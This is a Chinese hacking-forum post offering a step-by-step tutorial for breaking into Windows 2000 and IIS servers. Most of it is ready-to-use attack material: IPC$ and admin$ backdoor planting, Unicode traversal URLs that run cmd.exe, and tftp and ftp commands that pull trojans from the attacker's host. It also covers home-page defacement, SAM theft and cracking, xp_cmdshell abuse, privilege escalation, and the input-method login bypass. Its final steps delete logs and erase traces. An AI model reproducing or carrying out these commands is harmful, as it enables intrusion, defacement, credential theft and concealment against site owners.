20CN网络安全小组论坛 - 黑客进阶

论坛: 黑客进阶标题: Win2000入侵

作者: newmyth21 [newmyth21]

论坛用户

ipc探测大多基于139 用的工具当然是流光了呵呵其实还有别的工具也可以探测,我个人认为还是流光好.怎幺用流光的ipc探测帮助里写的相当相当详细了

流光的帮助是我见过黑客教学最傻瓜的了大家知道探测出密码了,可以用种植者

种植但是有时启动不起来那还要我们来帮助它吧呵呵

net use \\**.**.***.***\ipc$ "密码" /user:"这个你自己猜吧"

*** 是目标的位置就是ip 好象这是废话呵呵

copy \tools\srv.exe \\202.**.**.**\admin$\system32 这个就是把srv.exe 复制到肉鸡上

net time \\203.161"gt;**.** 这个就是查看肉鸡的时间

比如说是 02:22 这个有可能是 02:22 还有可能是 14:22

at \\203.**.**.** TIME srv.exe 这样就启动了 srv.exe了

然后就telnet 203.**.**.** 99 (srn.exe 其实就是在99端口开启个后门呵呵)

上去了吧哈哈对了上去也不代表我就控制了机器呀对呀你还要成为管理员这样就方便多了呵呵

命令是 net user 用户 /add 这个是创建个用户

net localgroup administrators 用户 /add 这呀就是把刚才你加的用户加到管理员权限里

好了现在你是管理员了呵呵 2000的一个很有用的就是做跳板

netsvc \\127.0.0.1 telnet /stop

netsvc \\127.0.0.1 telnet /start

这两个命令最好还是在肉鸡上执行

好象快点

好了ipc就介绍到这吧其实net命令很有用的强烈推荐大家好好看看命令详解

下面呢????好就cgi吧哈哈这个好象难了点我看见不少人都问怎幺用好我就给大家介绍介绍我其实也不怎幺熟的呵呵这是我转来得大家好好看看我也懒

一、Unicode漏洞的实现

要利用unicode利用，先要知道如何实现，通常，我们通过以下几种途径来利用Unicode漏洞:

--http://www.exsample.com/scripts/..蜡..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/_vti_bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/_mem_bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\
http://www.exsample.com/cgi-bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\

如果浏览器返回C:的目录列表，那幺就可以继续了。其中，从dir开始是真正的命令，用连接命令。（注：下面将不再把前面的地址写上，直接为命令）

二、如何修改对方主页？

通常，在系统盘的目录下有Inetpub目录.其中有个wwwroot目录是用来存放主页空间的。

先dir C:\Inetpub\wwwroot\察看目录：

返回:

======================================================

Directory of C:\inetpub\wwwroot

=========================================================

接着：我们就

del c:\inetpub\wwwroot\default.asp

echo Hacked By Hacker "gt; c:\inetpub\wwwroot\default.asp

利用echo命令和复位向符号创建新文件.

三、如果主页不在默认路径下，如何知道在哪里？

我们可以到他的主页上，选取他的标题图片，右键点击，看它的文件名。比如：exsample.gif

于是，我们用：

dir c:\exsample.gif/s

dir d:\exsmaple.gif/s

...

这样可以搜索到它的标题图片，通常在主页的images目录下，那幺这个目录的上级目录就是存放主页的。

按照二中所讲的方法可以修改其主页。

四、如何将文件上传？

这个是我们最关心的了，因为一旦上传了如ncx99一样的程序，那幺有些事就好办多了。偷懒的人也许上传个冰河上去：）。

方法：（俗称ftp方法）

echo open ftp.xxx.com（ftp主机） "gt; c:\temp.1 （可以随便取个名字，最好放到隐蔽的地方）

echo user yourname "gt;"gt; c:\temp.1 yourname是你的用户名

echo yourpasswd "gt;"gt; c:\temp.1 yourpasswd是你的密码

echo get ncx99.exe "gt;"gt; c:\temp.1 你要下载的文件

echo quit "gt;"gt; c:\temp.1

ftp /s:c:\temp.1

好了，过一会儿，用dir察看当前目录，就会看见ncx99.exe，酷！接下来如何，不用说了吧！

五、如何做个很大的文件？

我们可以用bat文件来实现。用echo建立如下文件，注意扩展名为bat:

@echo off

echo big "gt; x.x

:w

copy x.x x.x x.x

goto w

这样，就会……呵呵，不用说了吧，但这个好象不好。也可以上传个程序过去。这个只不过比较方便。

六、万一遇到长文件名怎幺办？

这是很菜鸟的问题，但确实有人不会用，我在这里简单地说一下：

例如：

c:\program files\microsoft billgates\hackermanandwoman.txt

如何表示？用：

c:\"quot;program20%files"quot;\"quot;microsoft20%billgates"quot;\hackermanandwoman.txt

七、如何删除脚印(日志)？

用如下命令：

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

八、如何创建新的用户名，并将用户名加入Administrator组？这个不一定会成功，由于你没有足够的权限。除非碰到一些傻瓜网站。

我们可以用echo创建一个bat文件。包含一下命令：

net user Myname MyPasswd /add /expires:never

net localgroup "quot;administrators"quot; /add Myname

然后，执行这个bat，就可以了。记得把它删除哦！

九、如何获得SAM数据库？

先用上传文件的方法上传samdump，然后用它把sam库拷贝到别的地方（直接下载SAM库是不行的）。

比如samdump C:\winnt\system32\config\sam C:\temp.aaa

然后在把temp.aaa上传到你的ftp服务器上，也可以把它拷贝到主页目录下，用浏览器下载。

呵呵上面说的其实很简单的
http://*****.***"gt;***/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/c dir c:\

这个就是最经典的unicode漏洞了最主要是能用命令呵呵 /winnt/system32/cmd.exe?/c 这个后面就是用命令的地方比如要看system32 文件夹的内容就是 /winnt/system32/cmd.exe?/c dir c:\winnt\system32

还有别的命令呵呵

../winnt/system32/cmd.exe?/c copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\

这个就是把 sam复制到wwwoot 呵呵到了那你知道要干什幺了吧当然了下载后破解密码呀哈哈对了破解密码的时间可不短呀呵呵不管是什幺漏洞都是为了得到管理员权限我们既然把srv.exe复制到肉鸡上了当然是启动他了用 ftp你可以自己社定地址比如你把srv.exe复制到C:\Inetpub\scripts\里了启动它就是 winnt/system32/cmd.exe?/c C:\Inetpub\scripts\srv.exe

既然启动你还塄着干什幺 telnet 呀呵呵还是 99 端口呀

攻击实例二

原理：(其实原来都很相似，我拿这个做个例子。)

NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode 字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。

对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如"quot;?hh"quot; 或者"quot;?hh"quot;,它会首先将其解码变成:0xc10xhh，然后尝试打开这个文件，Windows 系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果 0x00"lt;= %hh "lt; 0x40的话，采用的解码的格式与下面的格式类似：

?hh -"gt; (0xc1 - 0xc0) * 0x40 0xhh

?hh -"gt; (0xc0 - 0xc0) * 0x40 0xhh

因此，利用这种编码，我们可以构造很多字符，例如:

? -"gt; (0xc1 - 0xc0) * 0x40 0x1c = 0x5c = '/'

? -"gt; (0xc0 - 0xc0) * 0x40 0x2f = 0x2f = '\'

攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。

(1) 如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容：
http://www.victim.com/scripts/..?../winnt/system32/cmd.exe?/c dir

(2) 利用这个漏洞查看系统文件内容也是可能的：
http://www.victim.com/a.asp/..?../..?../winnt/win.ini

Rain Forest Puppy "lt;rfp@WIRETRIP.NET"gt;测试发现对于英文版的IIS 4.0/5.0,此问题同样存在，只是编码格式略有不同，变成"quot;蜡"quot;或者"quot;��"quot;. 下面我们的例子以?为主讲解。

注: 号可以用代替,依这种格式你还可以构造出许多命令

好多站点\inetpub\下的scripts目录删除了，

但\Program Files\Common Files\System\下

的msadc还在（有msadcs.dll漏洞的话就不用

?了）。这时可以如下构造请求：
http://ip/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c dir c:\

实践一：（修改主页----最简单化的一种）

很多入侵都以修改主页的形式表现出来，这通常有两种情况：一是表达自己的愤慨--比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后，国内很多黑客在ICQ、BBS一呼百应，纷纷对敌国进行各种形式的攻击，当然以替换主页最为大快人心！

二是在给网管发e-mail漏洞报告之后没反应，有的黑客按耐不住，就用修改主页的方式给予警告，用以引起人们对于安全技术的重视。当然说起来这是违法的啦，所以大家要注意哦，不要光图一时的痛快，呵呵！

可以使用ECHO命令、管道符等建立文件，修改文件内容。但因为IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符“"amp;|(,;%"lt;"gt;”，如果发现有这些字符就会返回500错误，所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法绕过去。
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\ccc.exe

然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo Hacked by chinese "gt; f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo 1/1/2001 "gt;"gt; f:\wwwroot\xxx\default.asp

就改了主页了！

这种方法对于有负载均衡的主机很不方便，又需要几次才能完成，所以不好。可以这样：
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd"quot;.exe?/c echo Hacked by hacker "gt; f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd"quot;.exe?/c echo 12/1/2k "gt;"gt; f:\wwwroot\xxx\default.asp

这样，主页就被更改成了：

Hacked by hacker

当然我是没有这样做啦，不过这些东西我都在自己配置的环境下实现了，

在我练习的过程中发现，用ECHO写这些的时候很慢，如果你多次回车，过一阵屏幕刷新后主页上就会留下多个你要写的内容。

实践二（下载SAM文件）

http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32

/cmd.exe?/c dir c:\发现列出了远程主机C:\下的所有文件，执行：
http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?/c

copy c:\autoexec.bat c:\autoexec.bak 成功实现文件的复制，

执行：http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/

cmd.exe?/c del c:\autoexec.bak 成功实现文件的删除，哇！太利害了。

随便浏览了一下，因为是国内的主机，不想搞破坏，只想练练手！目的：

获得Administrator权限。

执行：http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/

cmd.exe?/c copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\

把sam._文件拷贝到wwwroot文件内，输入：http://xxx.xxx.xxx.xxx/sam._

将sam._文件下载到本地，执行：
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c

del c:\inetpub\wwwroot\sam._清除痕迹。

在本机执行：C:"gt;expand sam._ sam

启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载），Import Sam File... 导入sam文件，Open Wordlist File...

打开一个字典，Run Crack，乖乖，要17个小时，不管它，让它慢慢破去，先睡个觉先！五分钟后来一看，Administrator 的 Nt Password 居然是 123456，我昏，

网管们注意了，这种密码也可以取呀？执行：C:\"gt;newletmein \\xxx.xxx.xxx -admin

扫描主机，发现管理员ID是：asdfghjk,执行：C:\"gt;net use \\xxx.xxx.xxx.xxxc$

winnt\system32\logfiles 看了看，呵呵！

实践三（用木马）

如果你对net use的使用不熟悉的话，可以找找相关的资料来看，net命令也是基本技能啊，好好掌握吧)

在本地设定一个共享目录，比如f:\123，把ncx99.exe和冰河服务端放在里面，同时为了试验，放了一个0字节的1.txt；然后再tftp98中把目录指向f:\123，现在就要让对方运行tftp.exe来下载文件啦！
http://xxx.xxx.xxx.xxx/scripts/cmd.exe?/c copy c:\winnt\system32\tftp.exe f:\wwwroot\scripts

然后
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i 111.111.111.111 get 1.txt cosys.txt

(111.111.111.111表示我们的ip，或者是我们的tftp服务器ip)

看，返回下面的内容：

CGI 错误

所指定的 CGI 应用程序处理有误，它未传回完整的 HTTP 标题。所传回的标题是：

Transfer successful: 0 bytes in 2 seconds, 0 bytes/s

这就成功啦！看看：
http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c dir 1.txt

果然有的，哈，继续：
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i 111.111.111.111 get ncx99.exe scripts.exe

现在继续把冰河弄上去，国货精品，也让同胞们看看嘛！这是最方便的啦，哈哈！
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i 111.111.111.111 get G_Client.exe c:\winnt\system32\iinter.exe

返回：

CGI 错误

所指定的 CGI 应用程序处理有误，它未传回完整的 HTTP 标题。所传回的标题是：

Transfer successful: 266240 bytes in 271 seconds, 982 bytes/s

成功啦，这样，我们就可以先让它中木马啦！
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/inter.exe

之后，用客户端连接过去，找到自己需要的东西，什幺？你不知道你需要什幺？

那你进去干什幺？！学习啊？好啊，学到什幺啦？总结一下，把纪录删掉（或者改写？覆盖？你自己想吧）

　

实际四（暴力法和权限升级）

在WIN2000的命令提示符下

这样输入

c:\"gt;newletmein xxx.xxx.xxx.xxx -all -g

xxx.xxx.xxx.xxx是你要攻击的网站的IP地址

然后等待程序执行完毕，如果发现可用的用户名和密码，程序会告诉你，记住这个用户名和密码，再这样输入(这里假设用户名为ADMIN。密码也是ADMIN）

c:\"gt;net use \\XXX.XXX.XXX.XXX\IPC$ "quot;ADMIN"quot; /USER:"quot;ADMIN"quot;

程序显示命令完成，接着来

c:\"gt;copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32

程序显示1个文件COPY成功

接着来

c:\"gt;copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32

程序显示1个文件COPY成功

接着来

c:\"gt;netsvc \\xxx.xxx.xxx.xxx schedule /start

等显示成功，接着来,这里假设对方时间为13:00(这里可以用NET TIME看时间）

c:\"gt;at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg

程序会告诉你这个命令的ID号，等时间一到，用木马连他的机器的65432端口可以加上自己的密码，和更改端口，目标搞定

到，为了确认这个漏洞，你可以在浏览器的网址栏里输入这个文件的具体路径来确认IE将显示application/x_varg，说明这个漏洞存在，然后在PERL下，进行攻击

C:\Perl\BIN"gt;perl -x msadcs.txt -h xxx.xxx.xxx.xxx

Please type the NT commandline you want to run (cmd /c assumed):\n

cmd /c 一般这里我用TFTP上传我的木马文件，但首先你得先设置好你的TFTP主机

tftp -i 127.0.0.1 get ntsrv.exe c:\winnt\system32\ntsrv.exe

这里127.0.0.1 是我的TFTP主机，TFTP目录下有NTSRV。EXE木马

如果程序执行成功，TFTP会显示文件传输的进度，然后再执行PERL，将木马激活，你再用木马连上对方的机器，搞定

如果WEB服务器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原码，而且把用户名或者密码写在这里，OK，你已经差不多搞定拉打开SQL SERVER 7。0 在client network uitlity里输入对方IP，通讯选TCP/IP端口选1433，然后应用确定，再打开query analyzer SERVER选你要攻击的IP，用户名和密码输入，连接他，等会，连上拉在上面这样输入

create proc #1 as exec master..xp_cmdshell'dir c:\'

go

exec #1

按F5执行，会显示对方机器的文件目录，然后用TFTP上传你的木马，并且执行，再用木马连接他

搞定（需要注意的是PROC的号要执行1次换1个，单引号间是命令行）

这里不说，也说不好，照着干就可以拉。发现目标XXX。XXX。XXX。XXX

在浏览器里输入
http://xxx.xxx.xxx.xxx/.idq

显示路径，WEB是在那里
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c dir

这样我们将得到对方的文件目录

然后这样
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe

等文件传完，再这样
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c c:\winnt\system32\ntsrv.exe

木马被启动，用木马连上，搞定。

如果权限不够，我们下面来升级权限

自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下，

（这三个文件是黑NT毕备的，很多站点可以下载到）

可以到DOS下输入：(下面是NETUSE后的盘，如果不懂，先学NETUSE去)

C:\"gt;copy c:\gasys.dll F:\

C:\"gt;copy c:\cmd.exe F:\

C:\"gt;copy c:\getadmin.exe F:\

至此为止，肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面，并且要改名，假设对方的物理盘为E ：
http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy e:\winnt\system32\cmd.exe e:\inetpub\scripts\hackercn

.exe

这样我们就已经把cmd.exe复制到了scripts的目录下，并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘：
http://127.1.1.1/scripts/hackercn.exe?/c net use Y: \\127.1.1.2\E

然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了，但因为改了名，所以还要再copy一次）：
http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy Y:\gasys.dll d:\inetpub\scripts\gasys.dll

http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy Y:\cmd.exe d:\inetpub\scripts\cmd.exe

http://127.1.1.1/scripts/..á../winnt/system32/cmd.exe?/c copy Y:\getadmin.exe d:\inetpub\scripts\getadmin.exe

好了，现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator（并不是每个站点都有“IUSR_计算机名”这个帐号）。假设这台计算机名为“S ERVERS”，那幺我们可以这样做：
http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS

这样所有的访问者都有了Administrator限权，

然后我们再来新建一个用户名为hacker密码为password的用户：
http://127.1.1.1/script/cmd.exe?/c c:\winnt\system32\net.exe user hacker password /add

然后再把它授予Administrator限权:
http://127.1.1.1/scripts/getadmin.exe?hacker

下来就是进入该系统并制作后门了：

在nt的dos下输入

C:\"gt;net use \\127.1.1.1\ipc$ "quot;password"quot; /user:"quot;hacker"quot;

现在你已经登陆到了他的主机上，然后上传木马冰河：

C:\"gt;copy C:\unzipped\newglacier\G_Server.exe \\127.1.1.1\admin$\system32

然后用net time来获得对方的时间：

C:\"gt;net time \\127.1.1.1

假设对方的时间是5点40，那幺我们将在5点43启动冰河程序：

C:\"gt;at \\127.1.1.1 05:43 G_Server.exe

这样我们就完整的实现了一次入侵，别忘了最后要打扫战场

用冰河很讨厌，我个人是不赞成用木马的，我们可以上载其它端口程序。

实践五（简单实用）

我们假设1.29.58.9有这类型漏洞

myip就是我的IP，GIFT是我计算机上共享的文件名。我把NCx99.exe那个文件放到这个目录下了。
http://1.29.58.9/scripts/..?../winnt/system32/net.exe?/c use i: \\myip\gift

时间要长点，多等一会儿。

成功后，你就可以用COPY命令，把NCX99.EXE文件从I盘CP过来了(放在system32或你喜欢的目录下)
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy i:\gift\ncx99.exe c:\inetpub\scripts\ncx99.exe

启动ncx99.exe
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c c:\inetpub\scripts\ncx99.exe

用telnet连上就可以了。

如果权限不够可以用上面我们讲的方法来增加权限。或添加用户。

实践六(打扫战场)

打扫战场

最后一步就是清除我们用到的一些临时文件和测试的文件，伪装一下日志，免得被发现，这就叫做是打扫战场。然后记得卸载冰河啊，我们不是过去破坏的，只是为了学习和研究，熟悉入侵的手段和思想，学会分析问题，解决问题，为将来的实战做个练习而已嘛！

所以也不要修改主页啦！给他们的网管留一份e-mail也好啦！

其实，我们传上去的ncx99.exe是netcat的另一个版本，运行后，会把cmd.exe绑定到99端口，

也就是说，运行以后，会在99端口侦听，我们可以用telnet连接。

C:"gt;telnet xxx.xxx.xxx.xxx 99

就看到：

c:\inetpub\scripts"gt;

呵呵，现在就相当于进入他的机器啦，后面的东西不用继续说了吧？键入exit退出后，对方的ncx99也退出啦。如果你真的想要他的管理员账号，那幺，我想，最起码可以这样：传个纪录键盘的东东上去，怎幺样？比你破解简单多啦！你当然也可以用冰河什幺的。你也可以给自己建个账号，方便自己，不过很可能会被发现的啦。

好啦好啦，不再说啦，烦死人了。

如果你用了木马，就要想办法去掉，要不就留到以后用。随你了。

这幺一次入侵完成了，我们至少要学会入侵的基本步骤，还有入侵的思维方式啦。

好好体会吧。

实用命令总结：

列目录：
http://ip/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c dir c:\
http://www.victim.com/scripts/..?../winnt/system32/cmd.exe?/c dir c:\

Copy文件
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\

NET USE的使用
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/net.exe?/c use i: \\myip\temp

改CMD方法
http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\ccc.exe

然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo Hacked by chinese "gt; f:\wwwroot\xxx\default.asp

FIND命令使用

比如我要查看WEB目录d:\inetpub\wwwroot下的所有asp、asa文件的内容：
http://xxx.xxx.xxx.xxx/scripts/..?..\winnt/system32/find.exe?/n /v "quot;"quot; d:\inetpub\wwwroot\*.as*

添加用户命令

新建一个用户名为hacker密码为password的用户：
http://127.1.1.1/script/cmd.exe?/c c:\winnt\system32\net.exe user hacker password /add

当然命令是构造出来的，利用这些规则我们可以写很多的类似的命令。

也希望大家把自己构造的好的想法和实现贴出来

如果你找不到目标可以去www.goole.com找。

它的危害大家我想都知道了。

呵呵大家多练习呀对了好象上面的 ftp 传文件很困难是吧我也是呵呵其实有个好工具哦

有了它你就有对 Unicode漏洞的实现我看哪个工具就是专门给Unicode漏洞用的

工具:

tftpd32.exe（一个FTP服务器）

ncx99.exe（telnet 到99端口）

这两个大家都熟悉吧，其它的不用管。

运行tftpd32.exe

这是一个小巧的FTP服务器，在运行它之前，建议关闭其它FTP服务器，保持tftpd运行，这时你的机器已经是一个FTP服务器了。

回到你的浏览器，在地址栏里填入：

http://202.111.111.11/scripts/..?../winnt/system32/cmd.exe?/c tftp -i%???.???.???.??? GET srv.exe c:\\inetpub\\scripts\\srv.exe

???.???.???.???为你自己的IP，注意：c:\\inetpub\\scripts\\srv.exe 其中c:\\inetpub\\scripts\\为主机服务器目录，要看主机的具体情况而定，srv.exe为被改名的ncx99.exe（自己选名字吧）。

然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了，您可以自己检查一下。

再使用如下调用来执行ncx99.exe(srv.exe)

http://202.100.100.1/scripts/..?../winnt/system32/cmd.exe?/c c:\inetpub\scripts\sr.exe

然后您就可以 telnet 202.111.111.11 99

以后就看你怎幺使用这台机器了。当然您上传什幺控制文件也由您自己决定，这只是一个方法。

srv.exe 这个其实就是ncx99.exe 呵呵你也可以自己改名字呀

好了 cgi 就将到着了要想更深入了解你还是自己找专门介绍cgi 的文章吧无心的cgi大全就很不错的

好了该将我最喜欢的 3389 了

什幺是终端服务就是让管理员远程管理计算机的但在输入法里有个致命漏洞

这样就对我们方便多了你可以用上面的ipc 和cgi 漏洞得到管理员权限在用3389 远程管理

好了该开始将输入法漏洞了

实际上我把3篇相关文章放到一起呢，我比较喜欢第一种实际测试中也证明非常好用可以完全成功的。

如何利用终端服务入侵远程计算机

by coolweis

coolweis@sina.com

用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。

恶意用户可以通过猜密码进入系统，更危险的是，如果这台机器存在输入法漏洞的话，那幺入侵者可以完全控制这台机器。

下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器：

首先我们确定某台机器的3389端口是开放的：

D:\\Nmapnt"gt;nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx

Starting nmapNT V. 2.53 by ryan@eEye.com

eEye Digital Security (
http://www.eeye.com

/ )

based on nmap by fyodor@insecure.org (
www.insecure.org/nmap

/ )

Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):

Port State Service

Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds

D:\TOOLS\nmapNT\Nmapnt"gt;

现在我们已经可以看到这台机器的终端服务是开放的，那幺我们就可以开始行动了。

打开终端服务客户端，添上IP地址，选择连接。

稍等片刻，一般是很快的，就会出现熟悉的登陆对话框了，这是我们看看有没有输入法的漏洞。有关输入法的漏洞请参看相关文章。如果有输入法漏洞那幺我们如何取得控制权呢？经过多次的研究试验。

终于想出了一个办法。我们发现在跳至url后，我们双击winnt目录下的explorer.exe并没什幺反应（是机上已经运行了，可是我们为什幺看不到结果呢？），如果我们不断的进行双击，或者什幺也不做，一会儿连接将被断开，在断开的一霎那，我们似乎看到了我们双击出来的窗口。经过几次试验，我们发现不登陆进去是不行的，将会被服务端断开。于是想办法先登陆进去，我想到了在帮助中打开用户管理器，经过试验，在跳至url中添入：

mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm

在右侧会出现一个可以打开本地用户和组的管理器的链接，本来在正常情况下是可以打开这个管理器的，可是在没有登陆进去的时候就是出不来，于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳至url中输入：c:\winnt\system32，然后找到net.exe，右键点击net.exe，选择创建快捷方式，于是创建了一个文件名为快捷方式net.lnk的文件，然后再右键点击这个快捷方式，选择属性，这时我们就可以输入我们的命令了。在目标中添入我们要执行的命令的路径和参数就行了，我们还是用net命令，因此不必改路径了，添加个账号test的命令如下，C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方式运行它。然后我们把这个账号添加到administrators组中，C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了，关掉帮助窗口，用test账号登陆，密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的TSinternetuser账号加进administrators组中，设置密码。这样我们下次就可以用这个账号进来了。然后再用这个账号登陆一下，如果能够登陆，就删掉刚刚建立的test账号。

这台机器就这样控制在我们的手里了。。。。。。

主题：输入法漏洞之完全心得及问题

由于微软对中国产品不付责任的态度，使得安装了终端服务和全拼（^^我只在全拼下成功）的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。

其过程如下：

net user guest /active:yes

net user guest elise

net localgroup administrators /add guest

windows2000的终端服务程序是以图开界面远程访问主机的3389端口，而微软的windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。下面以实例加以说明远程入侵一台主机。

　 1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。

　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。

　 3、出现windows2000的登陆窗口，按下CTRL SHIFT键，出现全拼输入法。

　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"quot;选项"quot;按右键。

　 5、选择"quot;跳转到URL"quot;，输入：c:\winnt\system32\cmd.exe.

　 6、选择"quot;保存到磁盘"quot;。

　 7、选择目录：c:\inetpub\scripts\

　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c dir c:\ （知道了吧）

　 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c echo BEIJING "gt;c:\inetpub\wwwroot\default.asp

　这是一个简单的例子，同志们可别用来对付国内的站点，因为这样的漏洞实在太多。

这个也是我转来得呵呵上面讲的很详细了好好看呀第一个很实际可行的呵呵

呵呵 3389 我的最爱要是漏洞都想这个这幺好找好用就好了

下面是什幺呢？呵呵就 SQL

我建议大家看流光的帮助 SQL使用说明上面太详细了要不我怎幺说流光好呢帮助都那样的傻瓜

还有就是关于IIS5.0 的益出这个呀还是看帮助对了小榕网站的说明比自带的帮助还要好理解:P

在别处还有别的IIS5.0益出的程序大家可以好好看看呵呵用中英文的还有日语什幺的都全了原理差不多

小榕新出的嗅探器很不错的呵呵没事可以试试的呵呵

对了安全第一呀呵呵

小榕早给我们准备好了就是哪个可以删除指定ip的程序可以该名用的

CleanIISLog ReadMe

CleanIISLog是一个清除IIS LOG记录的工具，和其它工具相比有以下不同点：

用法: CleanIISLog "lt;LogFile"gt;|"lt;."gt; "lt;CleanIP"gt;|"lt;."gt;

"lt;LogFile"gt;: 指定要处理的日志文件，如果指定为“.”，则处理所有的日志文件

（注意：处理所有日志文件需要很长的时间）。

"lt;CleanIP"gt;: 指定要清除的IP记录，如果指定为“.”，则清除所有的IP记录（不

推荐这样做）。

CleanIISLog只能在本地运行，而且必须具有Administrators权限。

比如把CleanIISLog该名成 MDJY

命令就 mdjy . **.**.**.**

呵呵当然是要是在肉鸡上运行呀呵呵还必须是Administrators权限

其实这些都是皮毛很多的还是要我门自己活学活用的

地主发表时间: 03-12-31 11:49

回复: wang0722 [wang0722]

论坛用户